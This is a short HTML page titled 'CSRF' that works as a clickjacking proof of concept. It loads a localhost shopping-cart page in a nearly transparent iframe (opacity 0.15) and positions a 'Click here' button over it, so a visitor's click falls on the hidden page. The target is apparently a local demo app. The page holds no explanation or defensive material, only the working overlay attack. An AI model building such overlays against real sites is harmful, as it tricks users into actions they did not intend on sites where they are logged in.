<!DOCTYPE html>
<html>
<head>
    <title>CSRF</title>
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/5.0.0-alpha1/js/bootstrap.min.js" 
          integrity="sha384-oesi62hOLfzrys4LxRF63OJCXdXDipiYWBnvTl9Y9/TRlw5xlKIEHpNyvvDShgf/" crossorigin="anonymous">
    <style>
        input[type=button] {
            position: absolute;
            left: 30px;
            top: 150px;
        }
        iframe {
            opacity: 0.15;
            height: 300px;
        }
    </style>
</head>
    <body>
        <input type="button" class="btn" value="Click here">
    <iframe src="https://localhost:5207/Home/ShowCart"></iframe>
    
    </body>
</html>